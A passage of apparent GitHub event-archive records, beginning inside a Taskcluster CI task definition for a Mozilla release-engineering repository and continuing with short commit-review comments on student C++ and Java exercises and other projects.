\\\"deadline\\\": \\\"2016-09-29T03:19:00.362Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"T5QTsoJ4Q4GRdGkWTeeS2A\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-29T03:19:00.362Z\\\"\\n}\\n  time:     2016-09-28T03:19:00.686Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"dVqTtXHWReGsKtmKONKIYA\"\n                },\n                \"payload\": {\n                    \"metadata\": {\n                        \"name\": \"shipit_frontend\",\n                        \"description\": \"Test, build and deploy shipit_frontend\",\n                        \"owner\": \"rok@garbas.si\",\n                        \"source\": \"https://github.com/mozilla-releng/services/tree/master/src/shipit_frontend\"\n                    },\n                    \"scopes\": [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.*\",\n                                \"push\"\n                            ],\n                            \"branches\": [\n                                \"master\"\n                            ]\n                        }\n                    },\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"payload\": {\n                        \"maxRunTime\": 7200,\n                        \"image\": \"nixos/nix:latest\",\n                        \"features\": {\n                            \"taskclusterProxy\": true\n                        },\n                        \"env\": {\n                            \"APP\": \"shipit_frontend\",\n                            \"TASKCLUSTER_SECRETS\": \"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\",\n                            \"GITHUB_EVENT\": \"pull_request.opened\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_PULL_REQUEST\": 60,\n                            \"GITHUB_BASE_REPO_URL\": \"https://github.com/mozilla-releng/services.git\",\n                            \"GITHUB_BASE_USER\": \"mozilla-releng\",\n                            \"GITHUB_BASE_SHA\": \"95815afcfc5c2871e7f7ed870e3238fc5a5fdc3e\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_BASE_REF\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/garbas/mozilla-releng-services.git\",\n                            \"GITHUB_HEAD_USER\": \"garbas\",\n                            \"GITHUB_HEAD_SHA\": \"4760569093551867dee0c25d0d820f1f9915a424\",\n                            \"GITHUB_HEAD_BRANCH\": \"trychooser\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"rok@garbas.si\"\n                        },\n                        \"command\": [\n                            \"/bin/bash\",\n                            \"-c\",\n                            \"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\"\n                        ]\n                    },\n                    \"created\": \"2016-09-28T03:19:00.362Z\",\n                    \"deadline\": \"2016-09-29T03:19:00.362Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"T5QTsoJ4Q4GRdGkWTeeS2A\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"routes\": [],\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"tags\": {},\n                    \"expires\": \"2017-09-29T03:19:00.362Z\"\n                },\n                \"time\": \"2016-09-28T03:19:00.686Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-releng/services:pull-request\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    }\n]\n```"}},"created_at":"2016-09-28T03:19:00Z"}
{"id":"4628271838","type":"CommitCommentEvent","actor":{"login":"LeonardoAlmeida96"},"repo":{"name":"LeonardoAlmeida96/crescer-2016-2"},"payload":{"comment":{"id":19201631,"position":5,"line":5,"path":"src/modulo-01-java-OO/modulo-01/Dwarve.java","commit_id":"3842ad38f8779b77f6dca68458fdaa6bded92eca","created_at":"2016-09-28T03:19:05Z","updated_at":"2016-09-28T03:19:05Z","body":"Ok, pensando nessa forma tem razão."}},"created_at":"2016-09-28T03:19:05Z"}
{"id":"4628272106","type":"CommitCommentEvent","actor":{"login":"LeonardoAlmeida96"},"repo":{"name":"LeonardoAlmeida96/crescer-2016-2"},"payload":{"comment":{"id":19201632,"position":10,"line":10,"path":"src/modulo-01-java-OO/modulo-01/Dwarve.java","commit_id":"3842ad38f8779b77f6dca68458fdaa6bded92eca","created_at":"2016-09-28T03:19:12Z","updated_at":"2016-09-28T03:19:12Z","body":"Ok"}},"created_at":"2016-09-28T03:19:12Z"}
{"id":"4628273099","type":"CommitCommentEvent","actor":{"login":"LeonardoAlmeida96"},"repo":{"name":"LeonardoAlmeida96/crescer-2016-2"},"payload":{"comment":{"id":19201633,"position":18,"line":18,"path":"src/modulo-01-java-OO/modulo-01/Dwarve.java","commit_id":"3842ad38f8779b77f6dca68458fdaa6bded92eca","created_at":"2016-09-28T03:19:37Z","updated_at":"2016-09-28T03:19:37Z","body":"Ok."}},"created_at":"2016-09-28T03:19:37Z"}
{"id":"4628273961","type":"CommitCommentEvent","actor":{"login":"LeonardoAlmeida96"},"repo":{"name":"LeonardoAlmeida96/crescer-2016-2"},"payload":{"comment":{"id":19201635,"position":null,"line":null,"path":null,"commit_id":"3842ad38f8779b77f6dca68458fdaa6bded92eca","created_at":"2016-09-28T03:19:58Z","updated_at":"2016-09-28T03:19:58Z","body":"O Código foi simplificado."}},"created_at":"2016-09-28T03:19:58Z"}
{"id":"4628277738","type":"CommitCommentEvent","actor":{"login":"LeonardoAlmeida96"},"repo":{"name":"LeonardoAlmeida96/crescer-2016-2"},"payload":{"comment":{"id":19201646,"position":null,"line":null,"path":null,"commit_id":"47c9143e3afacb7b68d3db4a7563619777866bfc","created_at":"2016-09-28T03:21:24Z","updated_at":"2016-09-28T03:21:24Z","body":"Foi ajustado o Teste que o cliente realmente solicitou."}},"created_at":"2016-09-28T03:21:24Z"}
{"id":"4628279023","type":"CommitCommentEvent","actor":{"login":"laynecsmall"},"repo":{"name":"operationzombie/apache-base"},"payload":{"comment":{"id":19201650,"position":5,"line":62,"path":"apache_flask.py","commit_id":"d1fe8edd665728ab4437f162236a3e865a94942c","created_at":"2016-09-28T03:21:54Z","updated_at":"2016-09-28T03:21:54Z","body":"@CallumGill ?\r\n"}},"created_at":"2016-09-28T03:21:54Z"}
{"id":"4628297833","type":"CommitCommentEvent","actor":{"login":"jfoug"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":19201701,"position":null,"line":null,"path":null,"commit_id":"7b47e453b4207fd758a2e2d2f5c642c15a8f32a6","created_at":"2016-09-28T03:29:21Z","updated_at":"2016-09-28T03:29:21Z","body":"I have run full tests on Fedora (CPU only, gcc only) for -asan   So things should be somewhat clean.  I also have run full test suite and corrected all the crashes I was seeing there.   I have been trying to keep up on asan usage (kind of like keeping my Solaris builds more up to date), but it is not being run in a CI manner, so things have been creeping in over time.   Getting things in the CI would keep those type bugs from making their way into the code at all."}},"created_at":"2016-09-28T03:29:21Z"}
{"id":"4628299479","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"duplyakin/Lesson_2_Home"},"payload":{"comment":{"id":19201702,"position":10,"line":10,"path":"01.cpp","commit_id":"8ecb3553070daf8ff3a953287a9013b395fa29a4","created_at":"2016-09-28T03:30:01Z","updated_at":"2016-09-28T03:30:01Z","body":"если не помните код начального символа, то используйте сам символ. он будет неявно приведен к целому числу по таблице ASCII\r\n\r\na = a + '0'"}},"created_at":"2016-09-28T03:30:01Z"}
{"id":"4628300408","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"duplyakin/Lesson_2_Home"},"payload":{"comment":{"id":19201704,"position":6,"line":6,"path":"02.cpp","commit_id":"5f9b10f3f8c285aca6c221d0e2258a9165e01560","created_at":"2016-09-28T03:30:20Z","updated_at":"2016-09-28T03:30:20Z","body":"пробелы"}},"created_at":"2016-09-28T03:30:20Z"}
{"id":"4628301101","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"duplyakin/Lesson_2_Home"},"payload":{"comment":{"id":19201707,"position":11,"line":11,"path":"06.cpp","commit_id":"b81bf60f23e54a8b4f10cef285b04dbc91001d92","created_at":"2016-09-28T03:30:34Z","updated_at":"2016-09-28T03:30:34Z","body":"пробелы"}},"created_at":"2016-09-28T03:30:34Z"}
{"id":"4628301422","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"duplyakin/Lesson_2_Home"},"payload":{"comment":{"id":19201709,"position":17,"line":17,"path":"06.cpp","commit_id":"b81bf60f23e54a8b4f10cef285b04dbc91001d92","created_at":"2016-09-28T03:30:42Z","updated_at":"2016-09-28T03:30:42Z","body":"пробелы"}},"created_at":"2016-09-28T03:30:42Z"}
{"id":"4628302051","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"duplyakin/Lesson_2_Home"},"payload":{"comment":{"id":19201711,"position":13,"line":13,"path":"06.cpp","commit_id":"b81bf60f23e54a8b4f10cef285b04dbc91001d92","created_at":"2016-09-28T03:30:56Z","updated_at":"2016-09-28T03:30:56Z","body":"как в Java, лучше всегда инициализировать все локальные переменные"}},"created_at":"2016-09-28T03:30:56Z"}
{"id":"4628304400","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"duplyakin/Lesson_2_Home"},"payload":{"comment":{"id":19201719,"position":17,"line":17,"path":"06.cpp","commit_id":"b81bf60f23e54a8b4f10cef285b04dbc91001d92","created_at":"2016-09-28T03:31:58Z","updated_at":"2016-09-28T03:31:58Z","body":"здесь 0 неявно приведен к символу '\\0', имеющим код 0. в массиве хранятся char, так что заполнять его лучше значениями типа char"}},"created_at":"2016-09-28T03:31:58Z"}
{"id":"4628304686","type":"CommitCommentEvent","actor":{"login":"mateusbpt"},"repo":{"name":"mateusbpt/crescer-2016-2"},"payload":{"comment":{"id":19201721,"position":8,"line":30,"path":"src/modulo-01-java-OO/modulo-01/ElfoTest.java","commit_id":"1704490b8be3a0e85aa7f9fa1ceab88a2008de54","created_at":"2016-09-28T03:32:06Z","updated_at":"2016-09-28T03:32:06Z","body":"Está certo"}},"created_at":"2016-09-28T03:32:06Z"}
{"id":"4628305066","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"duplyakin/Lesson_2_Home"},"payload":{"comment":{"id":19201722,"position":24,"line":24,"path":"06.cpp","commit_id":"b81bf60f23e54a8b4f10cef285b04dbc91001d92","created_at":"2016-09-28T03:32:15Z","updated_at":"2016-09-28T03:32:15Z","body":"здесь можно взять префиксную форму"}},"created_at":"2016-09-28T03:32:15Z"}
{"id":"4628305372","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"duplyakin/Lesson_2_Home"},"payload":{"comment":{"id":19201723,"position":22,"line":22,"path":"06.cpp","commit_id":"b81bf60f23e54a8b4f10cef285b04dbc91001d92","created_at":"2016-09-28T03:32:21Z","updated_at":"2016-09-28T03:32:21Z","body":"лишняя пустая строка"}},"created_at":"2016-09-28T03:32:21Z"}
{"id":"4628306364","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"duplyakin/Lesson_2_Home"},"payload":{"comment":{"id":19201726,"position":26,"line":26,"path":"06.cpp","commit_id":"b81bf60f23e54a8b4f10cef285b04dbc91001d92","created_at":"2016-09-28T03:32:43Z","updated_at":"2016-09-28T03:32:43Z","body":"а вот здесь вы правильно вычитаете код символа '0'"}},"created_at":"2016-09-28T03:32:43Z"}
{"id":"4628306842","type":"CommitCommentEvent","actor":{"login":"dreammed"},"repo":{"name":"dreammed/SevenKnightsAI"},"payload":{"comment":{"id":19201728,"position":null,"line":null,"path":null,"commit_id":"c8bfc7355ac2aa921e1d195233fb67ef84ec0e71","created_at":"2016-09-28T03:32:53Z","updated_at":"2016-09-28T03:32:53Z","body":"you can't to use mange button\r\njust manual copy current profile and rename to you want\r\nset to change like this \r\n![image](https://cloud.githubusercontent.com/assets/720862/18899850/3775a016-8566-11e6-8226-e3ec09f1989a.png)\r\n\r\nno necessary name hottime you can use other name like this\r\n![image](https://cloud.githubusercontent.com/assets/720862/18899920/ae524162-8566-11e6-924f-3e0f76676f41.png)\r\n\r\nmy setting general use 01-normal to farm ruby monster and change to hottime  to farm jewel "}},"created_at":"2016-09-28T03:32:53Z"}
{"id":"4628306908","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"duplyakin/Lesson_2_Home"},"payload":{"comment":{"id":19201729,"position":30,"line":30,"path":"06.cpp","commit_id":"b81bf60f23e54a8b4f10cef285b04dbc91001d92","created_at":"2016-09-28T03:32:54Z","updated_at":"2016-09-28T03:32:54Z","body":"здесь можно --i"}},"created_at":"2016-09-28T03:32:54Z"}
{"id":"4628308307","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"duplyakin/Lesson_2_Home"},"payload":{"comment":{"id":19201736,"position":30,"line":30,"path":"06.cpp","commit_id":"b81bf60f23e54a8b4f10cef285b04dbc91001d92","created_at":"2016-09-28T03:33:28Z","updated_at":"2016-09-28T03:33:28Z","body":"можно не вводить i, а использовать саму переменную Index. и сократить цикл до while()"}},"created_at":"2016-09-28T03:33:28Z"}
{"id":"4628310260","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"duplyakin/Lesson_2_Home"},"payload":{"comment":{"id":19201742,"position":29,"line":29,"path":"06.cpp","commit_id":"b81bf60f23e54a8b4f10cef285b04dbc91001d92","created_at":"2016-09-28T03:34:17Z","updated_at":"2016-09-28T03:34:17Z","body":"флаг не говорит, за что он отвечает. Лучше ввести enum с конкретными значениями для разных валют. enum Currency { DOLLAR = 0, ROUBLE = 1, ...}\r\n"}},"created_at":"2016-09-28T03:34:17Z"}
{"id":"4628311332","type":"CommitCommentEvent","actor":{"login":"ernestfegarido"},"repo":{"name":"idathena/trunk"},"payload":{"comment":{"id":19201744,"position":null,"line":null,"path":null,"commit_id":"c9c9dda255120f9c1fbc1fe10973c7d848291c07","created_at":"2016-09-28T03:34:41Z","updated_at":"2016-09-28T03:34:41Z","body":"welcome back master exneval!!!!!! 👍 :D"}},"created_at":"2016-09-28T03:34:41Z"}
{"id":"4628311993","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"duplyakin/Lesson_2_Home"},"payload":{"comment":{"id":19201748,"position":11,"line":11,"path":"08.cpp","commit_id":"ba14a709be1ad053086074276e9ac21a9381a1bf","created_at":"2016-09-28T03:34:58Z","updated_at":"2016-09-28T03:34:58Z","body":"лок переменные нужно инициализировать, как в Java"}},"created_at":"2016-09-28T03:34:58Z"}
{"id":"4628312893","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"duplyakin/Lesson_2_Home"},"payload":{"comment":{"id":19201753,"position":17,"line":17,"path":"08.cpp","commit_id":"ba14a709be1ad053086074276e9ac21a9381a1bf","created_at":"2016-09-28T03:35:21Z","updated_at":"2016-09-28T03:35:21Z","body":"комментированный код не должен быть в конечной версии приложения"}},"created_at":"2016-09-28T03:35:21Z"}
{"id":"4628313260","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"duplyakin/Lesson_2_Home"},"payload":{"comment":{"id":19201755,"position":24,"line":24,"path":"08.cpp","commit_id":"ba14a709be1ad053086074276e9ac21a9381a1bf","created_at":"2016-09-28T03:35:30Z","updated_at":"2016-09-28T03:35:30Z","body":"пробелы"}},"created_at":"2016-09-28T03:35:30Z"}
{"id":"4628314171","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"duplyakin/Lesson_2_Home"},"payload":{"comment":{"id":19201759,"position":6,"line":6,"path":"14.cpp","commit_id":"cbde9c6dee82cc099a169b81614c675423ac6884","created_at":"2016-09-28T03:35:51Z","updated_at":"2016-09-28T03:35:51Z","body":"здесь табы вместо 2-х пробело отступы - табы это плохо"}},"created_at":"2016-09-28T03:35:51Z"}
{"id":"4628314796","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"duplyakin/Lesson_2_Home"},"payload":{"comment":{"id":19201762,"position":10,"line":10,"path":"14.cpp","commit_id":"cbde9c6dee82cc099a169b81614c675423ac6884","created_at":"2016-09-28T03:36:03Z","updated_at":"2016-09-28T03:36:03Z","body":"пробелы ниже пляшут"}},"created_at":"2016-09-28T03:36:03Z"}
{"id":"4628315340","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"duplyakin/Lesson_2_Home"},"payload":{"comment":{"id":19201763,"position":19,"line":19,"path":"14.cpp","commit_id":"cbde9c6dee82cc099a169b81614c675423ac6884","created_at":"2016-09-28T03:36:15Z","updated_at":"2016-09-28T03:36:15Z","body":"неинициализированные лок перем"}},"created_at":"2016-09-28T03:36:15Z"}
{"id":"4628315752","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"duplyakin/Lesson_2_Home"},"payload":{"comment":{"id":19201765,"position":21,"line":21,"path":"14.cpp","commit_id":"cbde9c6dee82cc099a169b81614c675423ac6884","created_at":"2016-09-28T03:36:25Z","updated_at":"2016-09-28T03:36:25Z","body":"комментированный код нужно убирать"}},"created_at":"2016-09-28T03:36:25Z"}
{"id":"4628316934","type":"CommitCommentEvent","actor":{"login":"kennondmckeever"},"repo":{"name":"mackncheesiest/ECE474A_Projects"},"payload":{"comment":{"id":19201768,"position":null,"line":null,"path":null,"commit_id":"280cb00f686abe5ec84a070e56718dd878304c19","created_at":"2016-09-28T03:36:52Z","updated_at":"2016-09-28T03:36:52Z","body":"Yeah haha my bad\nIt should be all good to go though, and you all won't even need to touch\nCMake\n\nOn Sep 27, 2016 8:16 PM, \"Joshua Mack\" <notifications@github.com> wrote:\n\n> Lol, right as soon as I looked through f577cfb\n> <https://github.com/mackncheesiest/ECE474A_Projects/commit/f577cfbabc47527628207529ad51e57bdd45df64>\n> I was like \"oh no! I need to add a .gitignore\", but I see you did it here\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/mackncheesiest/ECE474A_Projects/commit/280cb00f686abe5ec84a070e56718dd878304c19#commitcomment-19201612>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ANnnCJWUx6dd-Kjw7sBhW_hl-925PSUcks5qudwbgaJpZM4KIYBm>\n> .\n>\n"}},"created_at":"2016-09-28T03:36:52Z"}
{"id":"4628318081","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"duplyakin/Lesson_4_Home"},"payload":{"comment":{"id":19201770,"position":18,"line":18,"path":"01.cpp","commit_id":"0fc9a843ebb2158fc3c9919e2aa6349e4574b4c2","created_at":"2016-09-28T03:37:20Z","updated_at":"2016-09-28T03:37:20Z","body":"лучше выбрасывать исключение, StackOverflowException. для этого заведите соответствующую структуру."}},"created_at":"2016-09-28T03:37:20Z"}
{"id":"4628318193","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"duplyakin/Lesson_4_Home"},"payload":{"comment":{"id":19201771,"position":27,"line":27,"path":"01.cpp","commit_id":"0fc9a843ebb2158fc3c9919e2aa6349e4574b4c2","created_at":"2016-09-28T03:37:23Z","updated_at":"2016-09-28T03:37:23Z","body":"лучше выбрасывать исключение, StackOverflowException. для этого заведите соответствующую структуру."}},"created_at":"2016-09-28T03:37:23Z"}
{"id":"4628318593","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"duplyakin/Lesson_4_Home"},"payload":{"comment":{"id":19201772,"position":36,"line":36,"path":"01.cpp","commit_id":"0fc9a843ebb2158fc3c9919e2aa6349e4574b4c2","created_at":"2016-09-28T03:37:33Z","updated_at":"2016-09-28T03:37:33Z","body":"лучше выбрасывать исключение, StackUnderfowException. для этого заведите соответствующую структуру."}},"created_at":"2016-09-28T03:37:33Z"}
{"id":"4628318803","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"duplyakin/Lesson_4_Home"},"payload":{"comment":{"id":19201774,"position":45,"line":45,"path":"01.cpp","commit_id":"0fc9a843ebb2158fc3c9919e2aa6349e4574b4c2","created_at":"2016-09-28T03:37:38Z","updated_at":"2016-09-28T03:37:38Z","body":"лучше выбрасывать исключение, StackUnderfowException. для этого заведите соответствующую структуру."}},"created_at":"2016-09-28T03:37:38Z"}
{"id":"4628319062","type":"CommitCommentEvent","actor":{"login":"mcgeeyoung"},"repo":{"name":"openeemeter/datastore"},"payload":{"comment":{"id":19201775,"position":null,"line":null,"path":null,"commit_id":"63b991f161dd6b3c743e315e98dfbd3f202a839d","created_at":"2016-09-28T03:37:44Z","updated_at":"2016-09-28T03:37:44Z","body":"Looks solid Phil"}},"created_at":"2016-09-28T03:37:44Z"}
{"id":"4628319503","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"duplyakin/Lesson_4_Home"},"payload":{"comment":{"id":19201776,"position":36,"line":36,"path":"01.cpp","commit_id":"0fc9a843ebb2158fc3c9919e2aa6349e4574b4c2","created_at":"2016-09-28T03:37:55Z","updated_at":"2016-09-28T03:37:55Z","body":"число -100 ничем не хуже других, и его можно положить в стек"}},"created_at":"2016-09-28T03:37:55Z"}
{"id":"4628319633","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"duplyakin/Lesson_4_Home"},"payload":{"comment":{"id":19201777,"position":45,"line":45,"path":"01.cpp","commit_id":"0fc9a843ebb2158fc3c9919e2aa6349e4574b4c2","created_at":"2016-09-28T03:37:59Z","updated_at":"2016-09-28T03:37:59Z","body":"число -100 ничем не хуже других, и его можно положить в стек"}},"created_at":"2016-09-28T03:37:59Z"}
{"id":"4628320523","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"duplyakin/Lesson_4_Home"},"payload":{"comment":{"id":19201782,"position":69,"line":69,"path":"01.cpp","commit_id":"0fc9a843ebb2158fc3c9919e2aa6349e4574b4c2","created_at":"2016-09-28T03:38:20Z","updated_at":"2016-09-28T03:38:20Z","body":"пробел после while"}},"created_at":"2016-09-28T03:38:20Z"}
{"id":"4628323892","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"duplyakin/Lesson_4_Home"},"payload":{"comment":{"id":19201787,"position":8,"line":8,"path":"04.cpp","commit_id":"75eaae9c76a585f12780cf4e16183ece13f5b415","created_at":"2016-09-28T03:39:41Z","updated_at":"2016-09-28T03:39:41Z","body":"обычно эту задачу решают с использованием стека. Вы уверены, что ваше решение работает на большом наборе случайных скобочных последовательностей? Нужно тогда написать стресс-тест, а потом реализацию на стеке, и сравнить ответы на одних и тех же входных данных"}},"created_at":"2016-09-28T03:39:41Z"}
{"id":"4628324295","type":"CommitCommentEvent","actor":{"login":"1558547456"},"repo":{"name":"1558547456/Hello-white"},"payload":{"comment":{"id":19201789,"position":null,"line":null,"path":null,"commit_id":"28761560c8a1a6f7e73cb443111da95746a00f3f","created_at":"2016-09-28T03:39:53Z","updated_at":"2016-09-28T03:39:53Z","body":"Hello my name is jiangshiwen;\r\ni age is 18;"}},"created_at":"2016-09-28T03:39:53Z"}
{"id":"4628325667","type":"CommitCommentEvent","actor":{"login":"macarole"},"repo":{"name":"macarole/app"},"payload":{"comment":{"id":19201790,"position":null,"line":null,"path":null,"commit_id":"842515639834a0aea7a72c3e7b4eb5b4ff54bb7a","created_at":"2016-09-28T03:40:26Z","updated_at":"2016-09-28T03:40:26Z","body":"这个文件压根就不应该上传上来，怪事了"}},"created_at":"2016-09-28T03:40:26Z"}
{"id":"4628325692","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"duplyakin/Lesson_4_Home"},"payload":{"comment":{"id":19201791,"position":132,"line":132,"path":"05.cpp","commit_id":"72a63ad4a747378daaa2e7db962dfdf04cae3cf6","created_at":"2016-09-28T03:40:26Z","updated_at":"2016-09-28T03:40:26Z","body":"вот в этом решении у вас стек. А попробуйте теперь решить так, как в предыдущей задаче - без стека. И сравнить результаты с помощью стресс-теста"}},"created_at":"2016-09-28T03:40:26Z"}
{"id":"4628325855","type":"CommitCommentEvent","actor":{"login":"jshap70"},"repo":{"name":"CodeCollaborate/Server"},"payload":{"comment":{"id":19201792,"position":25,"line":98,"path":"modules/datahandling/userrequests.go","commit_id":"72e5c5e432f5dc3c68acd26b9a79cdd0aa596e6a","created_at":"2016-09-28T03:40:30Z","updated_at":"2016-09-28T03:40:30Z","body":"this looks much better imo"}},"created_at":"2016-09-28T03:40:30Z"}
{"id":"4628326255","type":"CommitCommentEvent","actor":{"login":"jyrkive"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":19201794,"position":null,"line":null,"path":null,"commit_id":"296902d426a0ad09310c7b661abf2126b9d60dea","created_at":"2016-09-28T03:40:40Z","updated_at":"2016-09-28T03:40:40Z","body":"I *only* tested it in nogui mode.\r\n\r\nHowever, I didn't notice that the delays don't work. I quickly retested the plugin, and it generates activity as fast as possible, not every 15 seconds like it's intended.\r\n\r\nI'll fix it, fixing should be easy."}},"created_at":"2016-09-28T03:40:40Z"}
{"id":"4628326862","type":"CommitCommentEvent","actor":{"login":"jhudsonWA"},"repo":{"name":"ZipArchive/ZipArchive"},"payload":{"comment":{"id":19201795,"position":null,"line":null,"path":null,"commit_id":"d1e5f47e29da8fd661237718316d40519c9f9a00","created_at":"2016-09-28T03:40:53Z","updated_at":"2016-09-28T03:40:53Z","body":"Change reverted. Please test against master. I can't push a new release until I'm at my main mac tomorrow, but at least the change has reverted."}},"created_at":"2016-09-28T03:40:53Z"}
{"id":"4628327794","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"duplyakin/Lesson_4_Home"},"payload":{"comment":{"id":19201798,"position":65,"line":65,"path":"06.cpp","commit_id":"7849017a1bc7ddd55a400e7ddb1b84cb3a64291a","created_at":"2016-09-28T03:41:17Z","updated_at":"2016-09-28T03:41:17Z","body":"для этой задачи стек избыточен.\r\nпалиндромность можно проверить на лету, без стека и даже без использования дополнительной памяти под копию исходного массива"}},"created_at":"2016-09-28T03:41:17Z"}
{"id":"4628328835","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"duplyakin/Lesson_4_Home"},"payload":{"comment":{"id":19201800,"position":46,"line":46,"path":"08.cpp","commit_id":"08e1cbae89abf926b64ce718225634ce5cbce2fc","created_at":"2016-09-28T03:41:42Z","updated_at":"2016-09-28T03:41:42Z","body":"незаконченная задача?"}},"created_at":"2016-09-28T03:41:42Z"}
{"id":"4628330408","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"duplyakin/Lesson_4_Home"},"payload":{"comment":{"id":19201804,"position":21,"line":21,"path":"11.cpp","commit_id":"e480f978c60ecee18ea5b387925858a630ae93bc","created_at":"2016-09-28T03:42:19Z","updated_at":"2016-09-28T03:42:19Z","body":"висячий указатель, нужно инициализировать как nullptr"}},"created_at":"2016-09-28T03:42:19Z"}
{"id":"4628330789","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"duplyakin/Lesson_4_Home"},"payload":{"comment":{"id":19201805,"position":37,"line":37,"path":"11.cpp","commit_id":"e480f978c60ecee18ea5b387925858a630ae93bc","created_at":"2016-09-28T03:42:27Z","updated_at":"2016-09-28T03:42:27Z","body":"пробелы"}},"created_at":"2016-09-28T03:42:27Z"}
{"id":"4628331268","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"duplyakin/Lesson_4_Home"},"payload":{"comment":{"id":19201806,"position":38,"line":38,"path":"11.cpp","commit_id":"e480f978c60ecee18ea5b387925858a630ae93bc","created_at":"2016-09-28T03:42:39Z","updated_at":"2016-09-28T03:42:39Z","body":"флаг не имеет смысла в названии"}},"created_at":"2016-09-28T03:42:39Z"}
{"id":"4628331838","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"duplyakin/Lesson_4_Home"},"payload":{"comment":{"id":19201808,"position":29,"line":29,"path":"11.cpp","commit_id":"e480f978c60ecee18ea5b387925858a630ae93bc","created_at":"2016-09-28T03:42:54Z","updated_at":"2016-09-28T03:42:54Z","body":"комментированный код нужно удалить"}},"created_at":"2016-09-28T03:42:54Z"}
{"id":"4628332283","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"duplyakin/Lesson_4_Home"},"payload":{"comment":{"id":19201810,"position":38,"line":38,"path":"12.cpp","commit_id":"c416cfeb3db39ff56e5fe81af9df7fe1cc5afe30","created_at":"2016-09-28T03:43:06Z","updated_at":"2016-09-28T03:43:06Z","body":"divider"}},"created_at":"2016-09-28T03:43:06Z"}
